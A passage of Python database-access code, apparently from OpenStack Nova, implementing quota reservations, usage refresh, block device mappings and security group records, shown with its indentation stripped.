result = model_query(context, models.ProjectUserQuota).\
filter_by(project_id=project_id).\
all()
return result
@main_context_manager.writer
def quota_create(context, project_id, resource, limit, user_id=None):
per_user = user_id and resource not in PER_PROJECT_QUOTAS
quota_ref = models.ProjectUserQuota() if per_user else models.Quota()
if per_user:
quota_ref.user_id = user_id
quota_ref.project_id = project_id
quota_ref.resource = resource
quota_ref.hard_limit = limit
try:
quota_ref.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.QuotaExists(project_id=project_id, resource=resource)
return quota_ref
@main_context_manager.writer
def quota_update(context, project_id, resource, limit, user_id=None):
per_user = user_id and resource not in PER_PROJECT_QUOTAS
model = models.ProjectUserQuota if per_user else models.Quota
query = model_query(context, model).\
filter_by(project_id=project_id).\
filter_by(resource=resource)
if per_user:
query = query.filter_by(user_id=user_id)
result = query.update({'hard_limit': limit})
if not result:
if per_user:
raise exception.ProjectUserQuotaNotFound(project_id=project_id,
user_id=user_id)
else:
raise exception.ProjectQuotaNotFound(project_id=project_id)
###################
@require_context
@main_context_manager.reader
def quota_class_get(context, class_name, resource):
result = model_query(context, models.QuotaClass, read_deleted="no").\
filter_by(class_name=class_name).\
filter_by(resource=resource).\
first()
if not result:
raise exception.QuotaClassNotFound(class_name=class_name)
return result
@main_context_manager.reader
def quota_class_get_default(context):
rows = model_query(context, models.QuotaClass, read_deleted="no").\
filter_by(class_name=_DEFAULT_QUOTA_NAME).\
all()
result = {'class_name': _DEFAULT_QUOTA_NAME}
for row in rows:
result[row.resource] = row.hard_limit
return result
@require_context
@main_context_manager.reader
def quota_class_get_all_by_name(context, class_name):
rows = model_query(context, models.QuotaClass, read_deleted="no").\
filter_by(class_name=class_name).\
all()
result = {'class_name': class_name}
for row in rows:
result[row.resource] = row.hard_limit
return result
@main_context_manager.writer
def quota_class_create(context, class_name, resource, limit):
quota_class_ref = models.QuotaClass()
quota_class_ref.class_name = class_name
quota_class_ref.resource = resource
quota_class_ref.hard_limit = limit
quota_class_ref.save(context.session)
return quota_class_ref
@main_context_manager.writer
def quota_class_update(context, class_name, resource, limit):
result = model_query(context, models.QuotaClass, read_deleted="no").\
filter_by(class_name=class_name).\
filter_by(resource=resource).\
update({'hard_limit': limit})
if not result:
raise exception.QuotaClassNotFound(class_name=class_name)
###################
@require_context
@main_context_manager.reader
def quota_usage_get(context, project_id, resource, user_id=None):
query = model_query(context, models.QuotaUsage, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(resource=resource)
if user_id:
if resource not in PER_PROJECT_QUOTAS:
result = query.filter_by(user_id=user_id).first()
else:
result = query.filter_by(user_id=None).first()
else:
result = query.first()
if not result:
raise exception.QuotaUsageNotFound(project_id=project_id)
return result
def _quota_usage_get_all(context, project_id, user_id=None):
query = model_query(context, models.QuotaUsage, read_deleted="no").\
filter_by(project_id=project_id)
result = {'project_id': project_id}
if user_id:
query = query.filter(or_(models.QuotaUsage.user_id == user_id,
models.QuotaUsage.user_id == null()))
result['user_id'] = user_id
rows = query.all()
for row in rows:
if row.resource in result:
result[row.resource]['in_use'] += row.in_use
result[row.resource]['reserved'] += row.reserved
else:
result[row.resource] = dict(in_use=row.in_use,
reserved=row.reserved)
return result
@require_context
@main_context_manager.reader
def quota_usage_get_all_by_project_and_user(context, project_id, user_id):
return _quota_usage_get_all(context, project_id, user_id=user_id)
@require_context
@main_context_manager.reader
def quota_usage_get_all_by_project(context, project_id):
return _quota_usage_get_all(context, project_id)
def _quota_usage_create(project_id, user_id, resource, in_use,
reserved, until_refresh, session):
quota_usage_ref = models.QuotaUsage()
quota_usage_ref.project_id = project_id
quota_usage_ref.user_id = user_id
quota_usage_ref.resource = resource
quota_usage_ref.in_use = in_use
quota_usage_ref.reserved = reserved
quota_usage_ref.until_refresh = until_refresh
# updated_at is needed for the max_age check
quota_usage_ref.updated_at = timeutils.utcnow()
quota_usage_ref.save(session)
return quota_usage_ref
@main_context_manager.writer
def quota_usage_update(context, project_id, user_id, resource, **kwargs):
updates = {}
for key in ['in_use', 'reserved', 'until_refresh']:
if key in kwargs:
updates[key] = kwargs[key]
result = model_query(context, models.QuotaUsage, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(resource=resource).\
filter(or_(models.QuotaUsage.user_id == user_id,
models.QuotaUsage.user_id == null())).\
update(updates)
if not result:
raise exception.QuotaUsageNotFound(project_id=project_id)
###################
def _reservation_create(uuid, usage, project_id, user_id, resource,
delta, expire, session):
reservation_ref = models.Reservation()
reservation_ref.uuid = uuid
reservation_ref.usage_id = usage['id']
reservation_ref.project_id = project_id
reservation_ref.user_id = user_id
reservation_ref.resource = resource
reservation_ref.delta = delta
reservation_ref.expire = expire
reservation_ref.save(session)
return reservation_ref
###################
# NOTE(johannes): The quota code uses SQL locking to ensure races don't
# cause under or over counting of resources. To avoid deadlocks, this
# code always acquires the lock on quota_usages before acquiring the lock
# on reservations.
def _get_project_user_quota_usages(context, project_id, user_id):
rows = model_query(context, models.QuotaUsage,
read_deleted="no").\
filter_by(project_id=project_id).\
order_by(models.QuotaUsage.id.asc()).\
with_lockmode('update').\
all()
proj_result = dict()
user_result = dict()
# Get the total count of in_use and reserved
for row in rows:
proj_result.setdefault(row.resource,
dict(in_use=0, reserved=0, total=0))
proj_result[row.resource]['in_use'] += row.in_use
proj_result[row.resource]['reserved'] += row.reserved
proj_result[row.resource]['total'] += (row.in_use + row.reserved)
if row.user_id is None or row.user_id == user_id:
user_result[row.resource] = row
return proj_result, user_result
def _create_quota_usage_if_missing(user_usages, resource, until_refresh,
project_id, user_id, session):
"""Creates a QuotaUsage record and adds to user_usages if not present.
:param user_usages: dict of resource keys to QuotaUsage records. This is
updated if resource is not in user_usages yet or
until_refresh is not None.
:param resource: The resource being checked for quota usage.
:param until_refresh: Count of reservations until usage is refreshed,
int or None
:param project_id: The project being checked for quota usage.
:param user_id: The user being checked for quota usage.
:param session: DB session holding a transaction lock.
:return: True if a new QuotaUsage record was created and added
to user_usages, False otherwise.
"""
new_usage = None
if resource not in user_usages:
user_id_to_use = user_id
if resource in PER_PROJECT_QUOTAS:
user_id_to_use = None
new_usage = _quota_usage_create(project_id, user_id_to_use, resource,
0, 0, until_refresh or None, session)
user_usages[resource] = new_usage
return new_usage is not None
def _is_quota_refresh_needed(quota_usage, max_age):
"""Determines if a quota usage refresh is needed.
:param quota_usage: A QuotaUsage object for a given resource.
:param max_age: Number of seconds between subsequent usage refreshes.
:return: True if a refresh is needed, False otherwise.
"""
refresh = False
if quota_usage.in_use < 0:
# Negative in_use count indicates a desync, so try to
# heal from that...
LOG.debug('in_use has dropped below 0; forcing refresh for '
'QuotaUsage: %s', dict(quota_usage))
refresh = True
elif quota_usage.until_refresh is not None:
quota_usage.until_refresh -= 1
if quota_usage.until_refresh <= 0:
refresh = True
elif max_age and (timeutils.utcnow() -
quota_usage.updated_at).seconds >= max_age:
refresh = True
return refresh
def _refresh_quota_usages(quota_usage, until_refresh, in_use):
"""Refreshes quota usage for the given resource.
:param quota_usage: A QuotaUsage object for a given resource.
:param until_refresh: Count of reservations until usage is refreshed,
int or None
:param in_use: Actual quota usage for the resource.
"""
if quota_usage.in_use != in_use:
LOG.info(_LI('quota_usages out of sync, updating. '
'project_id: %(project_id)s, '
'user_id: %(user_id)s, '
'resource: %(res)s, '
'tracked usage: %(tracked_use)s, '
'actual usage: %(in_use)s'),
{'project_id': quota_usage.project_id,
'user_id': quota_usage.user_id,
'res': quota_usage.resource,
'tracked_use': quota_usage.in_use,
'in_use': in_use})
else:
LOG.debug('QuotaUsage has not changed, refresh is unnecessary for: %s',
dict(quota_usage))
# Update the usage
quota_usage.in_use = in_use
quota_usage.until_refresh = until_refresh or None
def _calculate_overquota(project_quotas, user_quotas, deltas,
project_usages, user_usages):
"""Checks if any resources will go over quota based on the request.
:param project_quotas: dict of resource quotas (limits) for the project.
:param user_quotas: dict of resource quotas (limits) for the user.
:param deltas: dict of resource keys to positive/negative quota
changes for the resources in a given operation.
:param project_usages: dict of resource keys to QuotaUsage records for the
project.
:param user_usages: dict of resource keys to QuotaUsage records for the
user.
:return: list of resources that are over-quota for the
operation.
"""
overs = []
for res, delta in deltas.items():
# We can't go over-quota if we're not reserving anything.
if delta >= 0:
# We can't go over-quota if we have unlimited quotas.
# over if the project usage + delta is more than project quota
if 0 <= project_quotas[res] < delta + project_usages[res]['total']:
LOG.debug('Request is over project quota for resource '
'"%(res)s". Project limit: %(limit)s, delta: '
'%(delta)s, current total project usage: %(total)s',
{'res': res, 'limit': project_quotas[res],
'delta': delta,
'total': project_usages[res]['total']})
overs.append(res)
# We can't go over-quota if we have unlimited quotas.
# over if the user usage + delta is more than user quota
elif 0 <= user_quotas[res] < delta + user_usages[res]['total']:
LOG.debug('Request is over user quota for resource '
'"%(res)s". User limit: %(limit)s, delta: '
'%(delta)s, current total user usage: %(total)s',
{'res': res, 'limit': user_quotas[res],
'delta': delta, 'total': user_usages[res]['total']})
overs.append(res)
return overs
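# A minimal sketch of how the check above behaves, using plain dicts in place
# of QuotaUsage rows (all names and numbers are illustrative):
#
#     project_quotas = {'cores': 20}
#     user_quotas = {'cores': 10}
#     deltas = {'cores': 4}
#     project_usages = {'cores': {'total': 12}}
#     user_usages = {'cores': {'total': 8}}
#     _calculate_overquota(project_quotas, user_quotas, deltas,
#                          project_usages, user_usages)
#     # -> ['cores'], because 8 + 4 exceeds the user limit of 10 even though
#     #    the project limit of 20 is not exceeded.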
@require_context
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@main_context_manager.writer
def quota_reserve(context, resources, project_quotas, user_quotas, deltas,
expire, until_refresh, max_age, project_id=None,
user_id=None):
elevated = context.elevated()
if project_id is None:
project_id = context.project_id
if user_id is None:
user_id = context.user_id
# Get the current usages
project_usages, user_usages = _get_project_user_quota_usages(
context, project_id, user_id)
# Handle usage refresh
work = set(deltas.keys())
while work:
resource = work.pop()
# Do we need to refresh the usage?
created = _create_quota_usage_if_missing(user_usages, resource,
until_refresh, project_id,
user_id, context.session)
refresh = created or _is_quota_refresh_needed(
user_usages[resource], max_age)
# OK, refresh the usage
if refresh:
# Grab the sync routine
sync = QUOTA_SYNC_FUNCTIONS[resources[resource].sync]
updates = sync(elevated, project_id, user_id)
for res, in_use in updates.items():
# Make sure we have a destination for the usage!
_create_quota_usage_if_missing(user_usages, res,
until_refresh, project_id,
user_id, context.session)
_refresh_quota_usages(user_usages[res], until_refresh,
in_use)
# Because more than one resource may be refreshed
# by the call to the sync routine, and we don't
# want to double-sync, we make sure all refreshed
# resources are dropped from the work set.
work.discard(res)
# NOTE(Vek): We make the assumption that the sync
# routine actually refreshes the
# resources that it is the sync routine
# for. We don't check, because this is
# a best-effort mechanism.
# Check for deltas that would go negative
unders = [res for res, delta in deltas.items()
if delta < 0 and
delta + user_usages[res].in_use < 0]
# Now, let's check the quotas
# NOTE(Vek): We're only concerned about positive increments.
# If a project has gone over quota, we want them to
# be able to reduce their usage without any
# problems.
for key, value in user_usages.items():
if key not in project_usages:
LOG.debug('Copying QuotaUsage for resource "%(key)s" from '
'user_usages into project_usages: %(value)s',
{'key': key, 'value': dict(value)})
project_usages[key] = value
overs = _calculate_overquota(project_quotas, user_quotas, deltas,
project_usages, user_usages)
# NOTE(Vek): The quota check needs to be in the transaction,
# but the transaction doesn't fail just because
# we're over quota, so the OverQuota raise is
# outside the transaction. If we did the raise
# here, our usage updates would be discarded, but
# they're not invalidated by being over-quota.
# Create the reservations
if not overs:
reservations = []
for res, delta in deltas.items():
reservation = _reservation_create(
str(uuid.uuid4()),
user_usages[res],
project_id,
user_id,
res, delta, expire,
context.session)
reservations.append(reservation.uuid)
# Also update the reserved quantity
# NOTE(Vek): Again, we are only concerned here about
# positive increments. Here, though, we're
# worried about the following scenario:
#
# 1) User initiates resize down.
# 2) User allocates a new instance.
# 3) Resize down fails or is reverted.
# 4) User is now over quota.
#
# To prevent this, we only update the
# reserved value if the delta is positive.
if delta > 0:
user_usages[res].reserved += delta
# Apply updates to the usages table
for usage_ref in user_usages.values():
context.session.add(usage_ref)
if unders:
LOG.warning(_LW("Change will make usage less than 0 for the following "
"resources: %s"), unders)
if overs:
if project_quotas == user_quotas:
usages = project_usages
else:
# NOTE(mriedem): user_usages is a dict of resource keys to
            # QuotaUsage sqlalchemy dict-like objects and doesn't log well
# so convert the user_usages values to something useful for
# logging. Remove this if we ever change how
# _get_project_user_quota_usages returns the user_usages values.
user_usages = {k: dict(in_use=v['in_use'], reserved=v['reserved'],
total=v['total'])
for k, v in user_usages.items()}
usages = user_usages
usages = {k: dict(in_use=v['in_use'], reserved=v['reserved'])
for k, v in usages.items()}
LOG.debug('Raise OverQuota exception because: '
'project_quotas: %(project_quotas)s, '
'user_quotas: %(user_quotas)s, deltas: %(deltas)s, '
'overs: %(overs)s, project_usages: %(project_usages)s, '
'user_usages: %(user_usages)s',
{'project_quotas': project_quotas,
'user_quotas': user_quotas,
'overs': overs, 'deltas': deltas,
'project_usages': project_usages,
'user_usages': user_usages})
raise exception.OverQuota(overs=sorted(overs), quotas=user_quotas,
usages=usages)
return reservations
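# A hedged usage sketch for the reserve/commit/rollback cycle implemented
# above. The context, resources and quota dicts are assumed to come from the
# quota engine; the deltas below are illustrative only:
#
#     deltas = {'instances': 1, 'cores': 2, 'ram': 2048}
#     rsv_ids = quota_reserve(ctxt, resources, project_quotas, user_quotas,
#                             deltas, expire, until_refresh=None, max_age=0)
#     try:
#         ...  # do the work the reservation covers
#         reservation_commit(ctxt, rsv_ids, project_id=ctxt.project_id)
#     except Exception:
#         reservation_rollback(ctxt, rsv_ids, project_id=ctxt.project_id)
#         raise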
def _quota_reservations_query(context, reservations):
"""Return the relevant reservations."""
# Get the listed reservations
return model_query(context, models.Reservation, read_deleted="no").\
filter(models.Reservation.uuid.in_(reservations)).\
with_lockmode('update')
@require_context
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@main_context_manager.writer
def reservation_commit(context, reservations, project_id=None, user_id=None):
_project_usages, user_usages = _get_project_user_quota_usages(
context, project_id, user_id)
reservation_query = _quota_reservations_query(context, reservations)
for reservation in reservation_query.all():
usage = user_usages[reservation.resource]
if reservation.delta >= 0:
usage.reserved -= reservation.delta
usage.in_use += reservation.delta
reservation_query.soft_delete(synchronize_session=False)
@require_context
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@main_context_manager.writer
def reservation_rollback(context, reservations, project_id=None, user_id=None):
_project_usages, user_usages = _get_project_user_quota_usages(
context, project_id, user_id)
reservation_query = _quota_reservations_query(context, reservations)
for reservation in reservation_query.all():
usage = user_usages[reservation.resource]
if reservation.delta >= 0:
usage.reserved -= reservation.delta
reservation_query.soft_delete(synchronize_session=False)
@main_context_manager.writer
def quota_destroy_all_by_project_and_user(context, project_id, user_id):
model_query(context, models.ProjectUserQuota, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
soft_delete(synchronize_session=False)
model_query(context, models.QuotaUsage, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
soft_delete(synchronize_session=False)
model_query(context, models.Reservation, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
soft_delete(synchronize_session=False)
@main_context_manager.writer
def quota_destroy_all_by_project(context, project_id):
model_query(context, models.Quota, read_deleted="no").\
filter_by(project_id=project_id).\
soft_delete(synchronize_session=False)
model_query(context, models.ProjectUserQuota, read_deleted="no").\
filter_by(project_id=project_id).\
soft_delete(synchronize_session=False)
model_query(context, models.QuotaUsage, read_deleted="no").\
filter_by(project_id=project_id).\
soft_delete(synchronize_session=False)
model_query(context, models.Reservation, read_deleted="no").\
filter_by(project_id=project_id).\
soft_delete(synchronize_session=False)
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@main_context_manager.writer
def reservation_expire(context):
current_time = timeutils.utcnow()
reservation_query = model_query(
context, models.Reservation, read_deleted="no").\
filter(models.Reservation.expire < current_time)
for reservation in reservation_query.join(models.QuotaUsage).all():
if reservation.delta >= 0:
reservation.usage.reserved -= reservation.delta
context.session.add(reservation.usage)
reservation_query.soft_delete(synchronize_session=False)
###################
def _ec2_volume_get_query(context):
return model_query(context, models.VolumeIdMapping, read_deleted='yes')
def _ec2_snapshot_get_query(context):
return model_query(context, models.SnapshotIdMapping, read_deleted='yes')
@require_context
@main_context_manager.writer
def ec2_volume_create(context, volume_uuid, id=None):
"""Create ec2 compatible volume by provided uuid."""
ec2_volume_ref = models.VolumeIdMapping()
ec2_volume_ref.update({'uuid': volume_uuid})
if id is not None:
ec2_volume_ref.update({'id': id})
ec2_volume_ref.save(context.session)
return ec2_volume_ref
@require_context
@main_context_manager.reader
def ec2_volume_get_by_uuid(context, volume_uuid):
result = _ec2_volume_get_query(context).\
filter_by(uuid=volume_uuid).\
first()
if not result:
raise exception.VolumeNotFound(volume_id=volume_uuid)
return result
@require_context
@main_context_manager.reader
def ec2_volume_get_by_id(context, volume_id):
result = _ec2_volume_get_query(context).\
filter_by(id=volume_id).\
first()
if not result:
raise exception.VolumeNotFound(volume_id=volume_id)
return result
@require_context
@main_context_manager.writer
def ec2_snapshot_create(context, snapshot_uuid, id=None):
"""Create ec2 compatible snapshot by provided uuid."""
ec2_snapshot_ref = models.SnapshotIdMapping()
ec2_snapshot_ref.update({'uuid': snapshot_uuid})
if id is not None:
ec2_snapshot_ref.update({'id': id})
ec2_snapshot_ref.save(context.session)
return ec2_snapshot_ref
@require_context
@main_context_manager.reader
def ec2_snapshot_get_by_ec2_id(context, ec2_id):
result = _ec2_snapshot_get_query(context).\
filter_by(id=ec2_id).\
first()
if not result:
raise exception.SnapshotNotFound(snapshot_id=ec2_id)
return result
@require_context
@main_context_manager.reader
def ec2_snapshot_get_by_uuid(context, snapshot_uuid):
result = _ec2_snapshot_get_query(context).\
filter_by(uuid=snapshot_uuid).\
first()
if not result:
raise exception.SnapshotNotFound(snapshot_id=snapshot_uuid)
return result
###################
def _block_device_mapping_get_query(context, columns_to_join=None):
if columns_to_join is None:
columns_to_join = []
query = model_query(context, models.BlockDeviceMapping)
for column in columns_to_join:
query = query.options(joinedload(column))
return query
def _scrub_empty_str_values(dct, keys_to_scrub):
"""Remove any keys found in sequence keys_to_scrub from the dict
if they have the value ''.
"""
for key in keys_to_scrub:
if key in dct and dct[key] == '':
del dct[key]
def _from_legacy_values(values, legacy, allow_updates=False):
if legacy:
if allow_updates and block_device.is_safe_for_update(values):
return values
else:
return block_device.BlockDeviceDict.from_legacy(values)
else:
return values
@require_context
@pick_context_manager_writer
def block_device_mapping_create(context, values, legacy=True):
_scrub_empty_str_values(values, ['volume_size'])
values = _from_legacy_values(values, legacy)
convert_objects_related_datetimes(values)
bdm_ref = models.BlockDeviceMapping()
bdm_ref.update(values)
bdm_ref.save(context.session)
return bdm_ref
@require_context
@pick_context_manager_writer
def block_device_mapping_update(context, bdm_id, values, legacy=True):
_scrub_empty_str_values(values, ['volume_size'])
values = _from_legacy_values(values, legacy, allow_updates=True)
convert_objects_related_datetimes(values)
query = _block_device_mapping_get_query(context).filter_by(id=bdm_id)
query.update(values)
return query.first()
@pick_context_manager_writer
def block_device_mapping_update_or_create(context, values, legacy=True):
_scrub_empty_str_values(values, ['volume_size'])
values = _from_legacy_values(values, legacy, allow_updates=True)
convert_objects_related_datetimes(values)
result = None
# NOTE(xqueralt): Only update a BDM when device_name was provided. We
# allow empty device names so they will be set later by the manager.
if values['device_name']:
query = _block_device_mapping_get_query(context)
result = query.filter_by(instance_uuid=values['instance_uuid'],
device_name=values['device_name']).first()
if result:
result.update(values)
else:
# Either the device_name doesn't exist in the database yet, or no
# device_name was provided. Both cases mean creating a new BDM.
result = models.BlockDeviceMapping(**values)
result.save(context.session)
# NOTE(xqueralt): Prevent from having multiple swap devices for the
# same instance. This will delete all the existing ones.
if block_device.new_format_is_swap(values):
query = _block_device_mapping_get_query(context)
query = query.filter_by(instance_uuid=values['instance_uuid'],
source_type='blank', guest_format='swap')
query = query.filter(models.BlockDeviceMapping.id != result.id)
query.soft_delete()
return result
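# Illustrative call (field names follow the BlockDeviceMapping model; the
# device name and source values below are made up for the sketch):
#
#     values = {'instance_uuid': instance.uuid,
#               'device_name': '/dev/vdb',
#               'source_type': 'volume',
#               'destination_type': 'volume',
#               'volume_id': volume['id']}
#     bdm = block_device_mapping_update_or_create(ctxt, values, legacy=False)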
@require_context
@pick_context_manager_reader_allow_async
def block_device_mapping_get_all_by_instance_uuids(context, instance_uuids):
if not instance_uuids:
return []
return _block_device_mapping_get_query(context).filter(
models.BlockDeviceMapping.instance_uuid.in_(instance_uuids)).all()
@require_context
@pick_context_manager_reader_allow_async
def block_device_mapping_get_all_by_instance(context, instance_uuid):
return _block_device_mapping_get_query(context).\
filter_by(instance_uuid=instance_uuid).\
all()
@require_context
@pick_context_manager_reader
def block_device_mapping_get_all_by_volume_id(context, volume_id,
columns_to_join=None):
return _block_device_mapping_get_query(context,
columns_to_join=columns_to_join).\
filter_by(volume_id=volume_id).\
all()
@require_context
@pick_context_manager_reader
def block_device_mapping_get_by_instance_and_volume_id(context, volume_id,
instance_uuid,
columns_to_join=None):
return _block_device_mapping_get_query(context,
columns_to_join=columns_to_join).\
filter_by(volume_id=volume_id).\
filter_by(instance_uuid=instance_uuid).\
first()
@require_context
@pick_context_manager_writer
def block_device_mapping_destroy(context, bdm_id):
_block_device_mapping_get_query(context).\
filter_by(id=bdm_id).\
soft_delete()
@require_context
@pick_context_manager_writer
def block_device_mapping_destroy_by_instance_and_volume(context, instance_uuid,
volume_id):
_block_device_mapping_get_query(context).\
filter_by(instance_uuid=instance_uuid).\
filter_by(volume_id=volume_id).\
soft_delete()
@require_context
@pick_context_manager_writer
def block_device_mapping_destroy_by_instance_and_device(context, instance_uuid,
device_name):
_block_device_mapping_get_query(context).\
filter_by(instance_uuid=instance_uuid).\
filter_by(device_name=device_name).\
soft_delete()
###################
@require_context
@main_context_manager.writer
def security_group_create(context, values):
security_group_ref = models.SecurityGroup()
# FIXME(devcamcar): Unless I do this, rules fails with lazy load exception
# once save() is called. This will get cleaned up in next orm pass.
security_group_ref.rules
security_group_ref.update(values)
try:
with main_context_manager.writer.savepoint.using(context):
security_group_ref.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.SecurityGroupExists(
project_id=values['project_id'],
security_group_name=values['name'])
return security_group_ref
def _security_group_get_query(context, read_deleted=None,
project_only=False, join_rules=True):
query = model_query(context, models.SecurityGroup,
read_deleted=read_deleted, project_only=project_only)
if join_rules:
query = query.options(joinedload_all('rules.grantee_group'))
return query
def _security_group_get_by_names(context, project_id, group_names):
"""Get security group models for a project by a list of names.
Raise SecurityGroupNotFoundForProject for a name not found.
"""
query = _security_group_get_query(context, read_deleted="no",
join_rules=False).\
filter_by(project_id=project_id).\
filter(models.SecurityGroup.name.in_(group_names))
sg_models = query.all()
if len(sg_models) == len(group_names):
return sg_models
# Find the first one missing and raise
group_names_from_models = [x.name for x in sg_models]
for group_name in group_names:
if group_name not in group_names_from_models:
raise exception.SecurityGroupNotFoundForProject(
project_id=project_id, security_group_id=group_name)
# Not Reached
@require_context
@main_context_manager.reader
def security_group_get_all(context):
return _security_group_get_query(context).all()
@require_context
@main_context_manager.reader
def security_group_get(context, security_group_id, columns_to_join=None):
query = _security_group_get_query(context, project_only=True).\
filter_by(id=security_group_id)
if columns_to_join is None:
columns_to_join = []
for column in columns_to_join:
if column.startswith('instances'):
query = query.options(joinedload_all(column))
result = query.first()
if not result:
raise exception.SecurityGroupNotFound(
security_group_id=security_group_id)
return result
@require_context
@main_context_manager.reader
def security_group_get_by_name(context, project_id, group_name,
columns_to_join=None):
query = _security_group_get_query(context,
read_deleted="no", join_rules=False).\
filter_by(project_id=project_id).\
filter_by(name=group_name)
if columns_to_join is None:
columns_to_join = ['instances', 'rules.grantee_group']
for column in columns_to_join:
query = query.options(joinedload_all(column))
result = query.first()
if not result:
raise exception.SecurityGroupNotFoundForProject(
project_id=project_id, security_group_id=group_name)
return result
@require_context
@main_context_manager.reader
def security_group_get_by_project(context, project_id):
return _security_group_get_query(context, read_deleted="no").\
filter_by(project_id=project_id).\
all()
@require_context
@main_context_manager.reader
def security_group_get_by_instance(context, instance_uuid):
return _security_group_get_query(context, read_deleted="no").\
join(models.SecurityGroup.instances).\
filter_by(uuid=instance_uuid).\
all()
@require_context
@main_context_manager.reader
def security_group_in_use(context, group_id):
# Are there any instances that haven't been deleted
# that include this group?
inst_assoc = model_query(context,
models.SecurityGroupInstanceAssociation,
read_deleted="no").\
filter_by(security_group_id=group_id).\
all()
for ia in inst_assoc:
num_instances = model_query(context, models.Instance,
read_deleted="no").\
filter_by(uuid=ia.instance_uuid).\
count()
if num_instances:
return True
return False
@require_context
@main_context_manager.writer
def security_group_update(context, security_group_id, values,
columns_to_join=None):
query = model_query(context, models.SecurityGroup).filter_by(
id=security_group_id)
if columns_to_join:
for column in columns_to_join:
query = query.options(joinedload_all(column))
security_group_ref = query.first()
if not security_group_ref:
raise exception.SecurityGroupNotFound(
security_group_id=security_group_id)
security_group_ref.update(values)
name = security_group_ref['name']
project_id = security_group_ref['project_id']
try:
security_group_ref.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.SecurityGroupExists(
project_id=project_id,
security_group_name=name)
return security_group_ref
def security_group_ensure_default(context):
"""Ensure default security group exists for a project_id."""
try:
# NOTE(rpodolyaka): create the default security group, if it doesn't
# exist. This must be done in a separate transaction, so that
# this one is not aborted in case a concurrent one succeeds first
# and the unique constraint for security group names is violated
# by a concurrent INSERT
with main_context_manager.writer.independent.using(context):
return _security_group_ensure_default(context)
except exception.SecurityGroupExists:
# NOTE(rpodolyaka): a concurrent transaction has succeeded first,
# suppress the error and proceed
return security_group_get_by_name(context, context.project_id,
'default')
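# Typical call-site sketch: callers simply ask for the default group and let
# the helper above absorb the create-vs-already-exists race (the context is
# assumed to carry a project_id and user_id):
#
#     default_group = security_group_ensure_default(ctxt)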
@main_context_manager.writer
def _security_group_ensure_default(context):
try:
default_group = _security_group_get_by_names(context,
context.project_id,
['default'])[0]
except exception.NotFound:
values = {'name': 'default',
'description': 'default',
'user_id': context.user_id,
'project_id': context.project_id}
default_group = security_group_create(context, values)
usage = model_query(context, models.QuotaUsage, read_deleted="no").\
filter_by(project_id=context.project_id).\
filter_by(user_id=context.user_id).\
filter_by(resource='security_groups')
# Create quota usage for auto created default security group
if not usage.first():
_quota_usage_create(context.project_id,
context.user_id,
'security_groups',
1, 0,
CONF.until_refresh,
context.session)
else:
usage.update({'in_use': int(usage.first().in_use) + 1})
default_rules = _security_group_rule_get_default_query(context).all()
for default_rule in default_rules:
        # This is suboptimal; the default_rule fields copied here should be
        # determined programmatically rather than listed by hand.
rule_values = {'protocol': default_rule.protocol,
'from_port': default_rule.from_port,
'to_port': default_rule.to_port,
'cidr': default_rule.cidr,
'parent_group_id': default_group.id,
}
_security_group_rule_create(context, rule_values)
return default_group
@require_context
@main_context_manager.writer
def security_group_destroy(context, security_group_id):
model_query(context, models.SecurityGroup).\
filter_by(id=security_group_id).\
soft_delete()
model_query(context, models.SecurityGroupInstanceAssociation).\
filter_by(security_group_id=security_group_id).\
soft_delete()
model_query(context, models.SecurityGroupIngressRule).\
filter_by(group_id=security_group_id).\
soft_delete()
model_query(context, models.SecurityGroupIngressRule).\
filter_by(parent_group_id=security_group_id).\
soft_delete()
def _security_group_count_by_project_and_user(context, project_id, user_id):
nova.context.authorize_project_context(context, project_id)
return model_query(context, models.SecurityGroup, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
count()
###################
def _security_group_rule_create(context, values):
security_group_rule_ref = models.SecurityGroupIngressRule()
security_group_rule_ref.update(values)
security_group_rule_ref.save(context.session)
return security_group_rule_ref
def _security_group_rule_get_query(context):
return model_query(context, models.SecurityGroupIngressRule)
@require_context
@main_context_manager.reader
def security_group_rule_get(context, security_group_rule_id):
result = (_security_group_rule_get_query(context).
filter_by(id=security_group_rule_id).
first())
if not result:
raise exception.SecurityGroupNotFoundForRule(
rule_id=security_group_rule_id)
return result
@require_context
@main_context_manager.reader
def security_group_rule_get_by_security_group(context, security_group_id,
columns_to_join=None):
if columns_to_join is None:
columns_to_join = ['grantee_group.instances.system_metadata',
'grantee_group.instances.info_cache']
query = (_security_group_rule_get_query(context).
filter_by(parent_group_id=security_group_id))
for column in columns_to_join:
query = query.options(joinedload_all(column))
return query.all()
@require_context
@main_context_manager.reader
def security_group_rule_get_by_instance(context, instance_uuid):
return (_security_group_rule_get_query(context).
join('parent_group', 'instances').
filter_by(uuid=instance_uuid).
options(joinedload('grantee_group')).
all())
@require_context
@main_context_manager.writer
def security_group_rule_create(context, values):
return _security_group_rule_create(context, values)
@require_context
@main_context_manager.writer
def security_group_rule_destroy(context, security_group_rule_id):
count = (_security_group_rule_get_query(context).
filter_by(id=security_group_rule_id).
soft_delete())
if count == 0:
raise exception.SecurityGroupNotFoundForRule(
rule_id=security_group_rule_id)
@require_context
@main_context_manager.reader
def security_group_rule_count_by_group(context, security_group_id):
return (model_query(context, models.SecurityGroupIngressRule,
read_deleted="no").
filter_by(parent_group_id=security_group_id).
count())
###################
def _security_group_rule_get_default_query(context):
return model_query(context, models.SecurityGroupIngressDefaultRule)
@require_context
@main_context_manager.reader
def security_group_default_rule_get(context, security_group_rule_default_id):
result = _security_group_rule_get_default_query(context).\
filter_by(id=security_group_rule_default_id).\
first()
if not result:
raise exception.SecurityGroupDefaultRuleNotFound(
rule_id=security_group_rule_default_id)
return result
@main_context_manager.writer
def security_group_default_rule_destroy(context,
security_group_rule_default_id):
count = _security_group_rule_get_default_query(context).\
filter_by(id=security_group_rule_default_id).\
